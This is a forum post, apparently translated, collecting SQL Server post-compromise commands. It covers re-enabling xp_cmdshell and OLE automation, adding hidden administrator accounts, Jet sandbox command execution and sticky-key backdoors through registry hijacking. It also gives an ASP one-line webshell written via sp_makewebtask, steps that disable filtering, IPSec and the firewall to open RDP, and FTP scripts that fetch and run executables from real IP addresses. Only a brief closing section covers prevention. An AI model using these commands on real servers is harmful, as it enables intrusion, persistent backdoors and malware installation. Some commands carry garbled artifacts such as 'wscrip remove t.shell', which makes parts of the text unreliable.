|
|
Posted on 3/18/2015 10:36:56 AM
|
|
|
|
1433 Repair Orders
net user SQLDebugger list /add
net localgroup administrators SQLDebugger /add
Error Message: Failed to find stored procedure 'master.. xp_cmdshell'。
Repair method: very general, in fact, other 126 127 can be repaired together,
Except xplog70.dll everything else can be fixed with this command
xp_cmdshell new recovery methods
Step 1: Delete:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
Server: Msg 3701, Level 11, State 5, Line 1
It is not possible to remove the process 'sp_addextendedproc' because it does not exist in the system directory.
Server: Msg 3701, Level 11, State 5, Procedure sp_dropextendedproc, Line 18
It is not possible to remove the process 'xp_cmdshell' because it does not exist in the system directory.
Step 2 Recovery:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Direct recovery, regardless of whether sp_addextendedproc exists or not
xplog70.dll fixes:
Error Message: The DLL xplog70.dll or one of the DLLs referenced by the DLL could not be mounted. Reason: 126 (The specified module cannot be found.) )。
Fix XPLOG70.DLL (first check the backup directory \x86\bin with the file, and then replace the following directory)
Step 1
exec sp_dropextendedproc 'xp_cmdshell'
Step 2
dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Failed to find stored procedure 'master.. xp_cmdshell'。
Step 1:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.) name of function to call
*/
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
Step 2:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
SQL Server blocked access to the process 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component was shut down as part of the security configuration for this server. System administrators can enable 'xp_cmdshell' by using sp_configure. For more information about enabling xp_cmdshell, see Peripheral App Configurator in the SQL Server Online Books series.
; EXEC sp_configure 'show advanced options', 1 --
; RECONFIGURE WITH OVERRIDE --
; EXEC sp_configure 'xp_cmdshell', 1 --
; RECONFIGURE WITH OVERRIDE --
; EXEC sp_configure 'show advanced options', 0 --
Remove SQL dangerous storage:
DROP PROCEDURE sp_makewebtask
exec master.. sp_dropextendedproc xp_cmdshell
exec master.. sp_dropextendedproc xp_dirtree
exec master.. sp_dropextendedproc xp_fileexist
exec master.. sp_dropextendedproc xp_terminate_process
exec master.. sp_dropextendedproc sp_oamethod
exec master.. sp_dropextendedproc sp_oacreate
exec master.. sp_dropextendedproc xp_regaddmultistring
exec master.. sp_dropextendedproc xp_regdeletekey
exec master.. sp_dropextendedproc xp_regdeletevalue
exec master.. sp_dropextendedproc xp_regenumkeys
exec master.. sp_dropextendedproc xp_regenumvalues
exec master.. sp_dropextendedproc sp_add_job
exec master.. sp_dropextendedproc sp_addtask
exec master.. sp_dropextendedproc xp_regread
exec master.. sp_dropextendedproc xp_regwrite
exec master.. sp_dropextendedproc xp_readwebtask
exec master.. sp_dropextendedproc xp_makewebtask
exec master.. sp_dropextendedproc xp_regremovemultistring
exec master.. sp_dropextendedproc sp_OACreate
DROP PROCEDURE sp_addextendedproc
Restore extended stored procedures
Restore the sp_addextendedproc first, the statement is as follows:
First:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.) name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
Second:
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
Delete the statement that extends the stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
Recover the sql statement of cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Open the cmdshell SQL statement
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Determine if storage expansion exists
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
The return result is 1 and it is OK
Restore xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
The return result is 1 and it is OK
Otherwise, upload xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Block the sql statement of cmdshell
sp_dropextendedproc "xp_cmdshell
One. Changing the SA Password Method:
After connecting with the SQL Comprehensive Utilization Tool, execute the command:
exec sp_password NULL, 'new password', 'sa'
(Hint: use with caution!)
Two. Simply patch the weak password.
Method 1: Query the splitter after connecting:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[ xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo]. [xp_cmdshell]'
GO
Then press the F5 key to execute the command
Method 2: Query after the splitter is connected
The first step is to execute: use master
Step 2: sp_dropextendedproc 'xp_cmdshell'
Then press the F5 key to execute the command
The DLL xpsql70.dll or one of the DLLs referenced by the DLL cannot be mounted. Reason 126 (The specified module cannot be found. )
Recovery method: After querying the splitter connection,
Step 1: sp_dropextendedproc "xp_cmdshell"
Step 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
The function xp_cmdshell cannot be found in the library xpweb70.dll. Reason: 127 (The specified program cannot be found.) )
Recovery method: After querying the splitter connection,
Step 1 Execution: exec sp_dropextendedproc 'xp_cmdshell'
Step 2: exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Then press the F5 key to execute the command
If none of the above methods are recoverable, please try adding the account directly using the following methods:
After querying the splitter connection,
2000servser system:
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP or 2003Server System: 126 Error! order
declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\
SQL Server blocked access to the process 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component was shut down as part of the security configuration for this server. System administrators can enable 'xp_cmdshell' by using sp_configure. For more information about enabling xp_cmdshell, see Peripheral App Configurator in the SQL Server Online Books series.
Statements executed by the analyzer:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Sometimes, when executing the above statements with a query detacher connection, the stored procedure cannot be found sp_addextendedproc
Workaround:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.) name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
This code is pasted into the query splitter and executed
Explorer:
c:\windows\explorer.exe
View the table of contents
exec master.dbo.xp_subdirs 'c:\'
List disks
exec master.. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\. DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg
Open 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
Pass 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Check out port 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Normal CMD back door
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
win2K goes directly to PS Mar
exec master.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP directly on PS horses
exec master.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Shift the backdoor command
declare @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
declare @o int
exec sp_oacreate 'wscrip remove t.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX is the command you want to execute
Write the value specified in the key specified in the registry), using the method (write bbb in the key HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue):
EXEC master.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\aaa',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'
@echo open 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo get gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
First, copy ftp.exe to the wmpub directory
@echo cd c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Open 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL writes a sentence
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
SA Sandbox Mode Promotion -----
----------------------
exec master.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389 SHIFT
The sentence used:
Invasion
EXEC master.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Recovery
EXEC master.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value=''
Image hijacking
EXEC master.. xp_regwrite --- this is registry editing!
@rootkey='HKEY_LOCAL_MACHINE', ---This is the position!
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', -----This is also the position!
@value_name='Debugger', --- this is the name of the table!
@type='REG_SZ', --- here is the meaning of writing!
@value='C:\WINDOWS\explorer.exe' ---- here is the written content!
The whole process is to use master: xp_regwrite this component is done,
1.sql command to query if the registry sticky key has been hijacked
exec master.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql command hijacks the registry sticky key function and replaces it with the task manager (of course you can replace it with other commands you want)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql command to remove the hijacking feature of the registry sticky key protects your server from being exploited by others
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
sql write files
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Scripts without NET escalation
struser=wscrip to remove t.arguments(0)
strpass=wscrip to remove t.arguments(1)
set lp=createObject("Wscrip remove t.NETWORK")
oz="WinNT://"&lp. ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od. SetPassword strpass
od. SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe. Add(of. ADsPath)
For Each admin in oe. Members
if struser=admin. Name then
Wscrip removed t.echo struser & "Established successfully!"
wscrip to remove t.quit
end if
Next
Wscrip remove t.echo struser & "User establishment failed!"
Save the above as user. VBS file
Then execute: cscrip to remove the user.vbs username password
Using JET sandbox mode, you can solve the problems caused by stored procedures such as XP_cmdshell and related dynamic link libraries. For security reasons, the system does not turn on the sandbox mode by default, which requires xp_regwrite to turn on the sandbox mode:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_DWORD',1
Then execute the sandbox command to add a user named test with the password 1234 to the system:
select * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
administrators test /add")')
Different operating systems have different paths and need to be modified according to the situation:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
In addition, in Microsoft SQL Server 2005, some stored procedures are closed by default and require commands to open:
Turn on XP_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure
'xp_cmdshell', 1; RECONFIGURE;
Open 'OPENROWSET':
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure
'Ad Hoc Distributed Queries',1; RECONFIGURE;
Turn on 'sp_oacreate':
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure
'Ole Automation Procedures',1; RECONFIGURE;
Here are a few situations where the execution command under sa is wrong:
1. The DLL xpsql70.dll or a DLL referenced by the DLL cannot be loaded. Reason 126 (The specified module cannot be found. )
This situation is relatively common, and the repair is simple and simple, but there are conditions. If you can list the directory in this case (with sqltools v2.0 there is a directory function) Congratulations on this 80% situation can be fixed, if you can list the directory, then just find the xplog70.dll path and execute the following command.
Step 1
exec sp_dropextendedproc 'xp_cmdshell' (this command is to delete the original cmdshell, because it has already gone wrong)
Step 2
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
; EXEC sp_configure 'show advanced options', 0 –
Of course this is a sql command, executed with a query analyzer. The c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll in the second step is the path of the xplog70.dll, this path is relatively common, if the c drive does not have it, you can find other drive letters.
2. Unable to find the function xp_cmdshell in the library xpweb70.dll. Reason: 127 (The specified program cannot be found.) )
In fact, this is the same as the above 126, that is, the cmdshell is wrong, as long as you find the backup xplog70.dll follow the above method to fix it.
3. Failed to find the stored procedure 'master.' xpcmdshell'
In this case, I see on the Internet that the method is:
Step 1: Delete:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
Step 2 Recovery:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
In fact, this is still the same as the above, in fact, if you are careful, the above 126 127 will only fail to find the stored procedure 'master:. xpcmdshell' because the first step is to delete the stored procedure of cmdshell. So in this case, just follow the second step above.
4. Error Message: SQL Server blocked access to process 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component was shut down as part of this server's security configuration. System administrators can enable 'xp_cmdshell' by using sp_configure. For more information about enabling xp_cmdshell, see Peripheral App Configurator in the SQL Server Online Books series.
This situation is the simplest, because you don't have to think about anything, just execute the following command
; EXEC sp_configure 'show advanced options', 1 --
; RECONFIGURE WITH OVERRIDE --
; EXEC sp_configure 'xp_cmdshell', 1 --
; RECONFIGURE WITH OVERRIDE --
; EXEC sp_configure 'show advanced options', 0 –
After the above fix, you can execute the cmd command, and you will start to elevate your power. I usually check the ip first to see if it is an intranet, and then REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber to check the terminal port, and then netstat –an to see if the terminal is open and then net user user password / add a user and then net localgroup administrators user /add If everything goes well, this will take down a server. But there are many problems in the process.
1. The net power promotion is successful but cannot connect to the terminal There are the following situations
(1) The server is on the intranet.
(2) TCP/IP screening.
Run the following cmd command first:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, export the first part of the registry for TCP/IP filtering
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, export the second part of the registry for TCP/IP filtering
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", exporting the third place in the registry about TCP/IP filtering
Then go back to the c drive 1.reg, 2.reg, 3.reg, download the 1.reg, 2.reg, 3.reg back to your hard drive to edit, find the EnableSecurityFilters field to see if the key value after the dword is 00000000, if it is 00000001, it means that the administrator has done tcp/ip filtering, we just need to change 1 to 0, 2. reg and 3.reg make the same changes.
(3) Make an IP security policy.
Run the cmd command: cmd /c net stop policyagent to stop the IPSEC Services service. Connect the terminal again.
(4) The login permission of the terminal set by the administrator can only be used by the specified user.
(5) Firewall. Run the cmd command: net stop alg /ynet stop sharedaccess
2. NET escalation appears and access is refused
You can try net1 user user password /add If net1 also denies access, you can copy a shfit backdoor and try to execute the cmd command: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
If prompted copy 1 file which proves successful. Connect to the terminal and press 5 shift to see what pops up. Play with Kaka Explorer, now just add a user by hand.
3. Net escalation occurs with access refusal error 5 (highlight)
In this case, you don't need to try net1, you can try the copy shift backdoor, if the copy prompts to copy the 0 file, it proves that it is not successful. Then you can try to upload it, if you can upload it, you can directly send a non-net power escalation tool that came out some time ago, and then add a user. But most of these cases cannot be uploaded, so you have to think about it. Since cmd can be executed, then the file can be downloaded through cmd under ftp, but the premise of ftp is to be able to write text or batch processing. Then you can write a text or batch through a SQL statement.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp account'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp password'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (no net escalation script) c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
After the query analyzer is successfully executed, an 1.bat will appear on the C drive (if the execution is successful, but the C drive is not there, you can change the folder to write, because which server's C drive root directory prohibits writing)
Then cmd executes ftp -s:c:\1.bat
After this is executed, you will download a non-net escalation script on the CFT drive FTP or write a VBS escalation script directly
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
Then cmd executes cscrip to remove t c:\1.vbs
4. The previous one is repaired to execute cmd commands, but after some repairs, new problems will appear
(1) Message: An error occurred during the execution of xp_cmdshell. Call 'CreateProcess' failed with error code: '5'.
Error 5 is an error number prompted by the system, CreateProcess is the meaning of creating a thread, this error generation has a lot to do with the cmd.exe of system files, one is that cmd is deleted, the other is that the permission of cmd is reduced.
SQL to check terminal ports and open status:
exec master.. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Okay, the key point below is to use two SQL instructions to copy the system's explorer file into the system's shift backdoor file, and the following two statements are executed separately.
This statement copies explorer.exe as sethc.exe
declare @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
This statement copies sethc.exe to the dllcache directory
declare @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe';
The other two statements use sp_oacreate stored procedures that need to use odsole70.dll file, so the survival of this file is related to the success of its creation.
(2), xpsql.cpp: Error 5 from CreateProcess (line 737)
This situation is more tricky, and it is said on the Internet
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
I checked the sandbox to raise the rights of this matter, but through my practice, this success rate is very low, because most servers have deleted c:\windows\system32\ias\ias.mdb. Then you can try image hijacking sethc, of course, image hijacking is also conditional, 1 to exist xp_regwrite this stored procedure 2 is 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' Debugger' is not deleted
You can first query whether the registry sticky key has been hijacked
exec master.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
If the prompt does not find the problem, the proof is deleted, there is no way, if prompted sethc.exe execute the sql command
EXEC master.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
After connecting to the terminal 5 times and shifting, it goes directly to the desktop, and then adds it manually.
The registry modifies the terminal port
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
Regarding the prevention of image hijacking, it is mainly achieved through the following methods:
★ Permission Restriction Law
If the user no longer has access to the registry key, it cannot modify these things. Open the Registry Editor and go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options, select this item, right-click - > permissions - > advanced, and lower the permissions of administrator and system users (here you just need to cancel the write operation).
★ Quick knife cutting messy hemp method
Open the registry editor and go to the bar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
The problem can be solved by directly deleting the Image File Execution Options item.
sql command hijacks registry sticky key installation backdoor
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Software Download:Tourists, if you want to see the hidden content of this post, please Reply
|
Previous:Understanding of DDL, DML, and DCLNext:oracle gets the string length functions length() and hengthb()
|
Posted on 3/19/2015 8:26:09 PM
|
